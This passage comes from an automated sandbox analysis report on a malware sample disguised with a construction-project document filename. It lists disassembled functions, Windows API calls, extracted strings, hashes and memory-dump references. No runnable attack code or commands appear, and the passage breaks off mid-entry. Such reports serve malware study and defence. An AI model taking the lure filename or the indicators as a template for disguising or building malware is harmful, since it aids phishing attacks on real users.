                                                                                                                          • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                                                                                          • Opcode Fuzzy Hash: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                                                                                                                          • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                                                                                          Function 0040D2AB Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                                          • String ID: 0$6
                                                                                                                          • API String ID: 4066108131-3849865405
                                                                                                                          • Opcode ID: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                                                                                                          • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                                                          • Opcode Fuzzy Hash: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                                                                                                          • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                                                          Function 004082C7 Relevance: 15.2, APIs: 10, Instructions: 229COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 004082EF
                                                                                                                            • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                          • memset.MSVCRT ref: 00408362
                                                                                                                          • memset.MSVCRT ref: 00408377
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$ByteCharMultiWide
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 290601579-0
                                                                                                                          • Opcode ID: aa14e1b9e389497361ed401ed70ebc10d5f62d7ff5e107018b9223dc9ab6e0fb
                                                                                                                          • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                                                          • Opcode Fuzzy Hash: aa14e1b9e389497361ed401ed70ebc10d5f62d7ff5e107018b9223dc9ab6e0fb
                                                                                                                          • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                                                          Function 00444E84 Relevance: 15.2, APIs: 8, Strings: 2, Instructions: 183COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • memchr.MSVCRT ref: 00444EBF
                                                                                                                          • memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                          • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                          • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                                          • memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
                                                                                                                          • memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
                                                                                                                          • memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
                                                                                                                          • memset.MSVCRT ref: 0044505E
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpy$memchrmemset
                                                                                                                          • String ID: PD$PD
                                                                                                                          • API String ID: 1581201632-2312785699
                                                                                                                          • Opcode ID: 0e910d3a8e1f8c818d40de505798e2cb595e2298e7188f8e397b04e98a163445
                                                                                                                          • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                                                                                          • Opcode Fuzzy Hash: 0e910d3a8e1f8c818d40de505798e2cb595e2298e7188f8e397b04e98a163445
                                                                                                                          • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                                                                                          Function 00409F42 Relevance: 15.1, APIs: 10, Instructions: 103COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                                                                          • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                                                                          • GetDC.USER32(00000000), ref: 00409F6E
                                                                                                                          • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                                                                          • GetParent.USER32(?), ref: 00409FA5
                                                                                                                          • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2163313125-0
                                                                                                                          • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                                          • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                                                                                          • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                                          • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                                                                                          Function 004028E7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 190COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: free$wcslen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3592753638-3916222277
                                                                                                                          • Opcode ID: ee4a635328ec67d54f876bdb2dea934223b4b651374da98f2fba9a82a9ef0b7d
                                                                                                                          • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                                                                          • Opcode Fuzzy Hash: ee4a635328ec67d54f876bdb2dea934223b4b651374da98f2fba9a82a9ef0b7d
                                                                                                                          • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                                                                          Function 0040A45A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 0040A47B
                                                                                                                          • _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                          • wcslen.MSVCRT ref: 0040A4BA
                                                                                                                          • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                          • wcslen.MSVCRT ref: 0040A4E0
                                                                                                                          • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                          • String ID: %s (%s)$YV@
                                                                                                                          • API String ID: 3979103747-598926743
                                                                                                                          • Opcode ID: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                                                                                                          • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                                                          • Opcode Fuzzy Hash: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                                                                                                          • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                                                          Function 004044A4 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                                                                                                          • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                                                                                                          • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                          • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                          • API String ID: 2780580303-317687271
                                                                                                                          • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                          • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                                                          • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                          • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                                                          Function 0040A661 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarywindowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000,?,00412758,00000000), ref: 0040A686
                                                                                                                          • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669), ref: 0040A6A4
                                                                                                                          • wcslen.MSVCRT ref: 0040A6B1
                                                                                                                          • wcscpy.MSVCRT ref: 0040A6C1
                                                                                                                          • LocalFree.KERNEL32(00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000), ref: 0040A6CB
                                                                                                                          • wcscpy.MSVCRT ref: 0040A6DB
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                          • String ID: Unknown Error$netmsg.dll
                                                                                                                          • API String ID: 2767993716-572158859
                                                                                                                          • Opcode ID: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
                                                                                                                          • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                                                          • Opcode Fuzzy Hash: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
                                                                                                                          • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                                                          Function 0040DAE1 Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                          • wcscpy.MSVCRT ref: 0040DAFB
                                                                                                                          • wcscpy.MSVCRT ref: 0040DB0B
                                                                                                                          • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                                                            • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                                          • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                          • API String ID: 3176057301-2039793938
                                                                                                                          • Opcode ID: 19b23b35163b1b9442cb05249b6519e0ec66bb1c0419b9cd6882ee6235bf6311
                                                                                                                          • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                                                                          • Opcode Fuzzy Hash: 19b23b35163b1b9442cb05249b6519e0ec66bb1c0419b9cd6882ee6235bf6311
                                                                                                                          • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                                                                          Function 0042F5F4 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 250COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          • unable to open database: %s, xrefs: 0042F84E
                                                                                                                          • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                                                          • too many attached databases - max %d, xrefs: 0042F64D
                                                                                                                          • database %s is already in use, xrefs: 0042F6C5
                                                                                                                          • database is already attached, xrefs: 0042F721
                                                                                                                          • out of memory, xrefs: 0042F865
                                                                                                                          • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpymemset
                                                                                                                          • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                          • API String ID: 1297977491-2001300268
                                                                                                                          • Opcode ID: b87818fa112a0acc8a66a9ae252063e0b2e26e7fac12933c278b7e571d5e68ae
                                                                                                                          • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                                                                          • Opcode Fuzzy Hash: b87818fa112a0acc8a66a9ae252063e0b2e26e7fac12933c278b7e571d5e68ae
                                                                                                                          • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                                                                          Function 0040EAFF Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 160COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040EB3F
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040EB5B
                                                                                                                          • memcpy.MSVCRT(?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB80
                                                                                                                          • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB94
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,?,004126A8,00000000), ref: 0040EC17
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000,?,004126A8,00000000), ref: 0040EC21
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,?,004126A8,00000000), ref: 0040EC59
                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                                            • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                                          • String ID: ($d
                                                                                                                          • API String ID: 1140211610-1915259565
                                                                                                                          • Opcode ID: a1c7ed4194c507a0631b10337623f35aa4fe9b12b4df3912366feb9681346245
                                                                                                                          • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                                                                                          • Opcode Fuzzy Hash: a1c7ed4194c507a0631b10337623f35aa4fe9b12b4df3912366feb9681346245
                                                                                                                          • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                                                                                          Function 00417887 Relevance: 13.6, APIs: 9, Instructions: 126filesleepCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                                                          • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                                                          • GetLastError.KERNEL32 ref: 004178FB
                                                                                                                          • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$ErrorLastLockSleepUnlock
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3015003838-0
                                                                                                                          • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                          • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                                                                          • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                          • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                                                                          Function 00407E1E Relevance: 13.6, APIs: 9, Instructions: 115COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 00407E44
                                                                                                                          • memset.MSVCRT ref: 00407E5B
                                                                                                                          • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                                          • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                                          • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                                          • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                                          • wcscpy.MSVCRT ref: 00407F10
                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 59245283-0
                                                                                                                          • Opcode ID: 5e520accdd45059f4d080cd8d67ab72c1dc8c36b7959bb75ad43466fad0b9107
                                                                                                                          • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
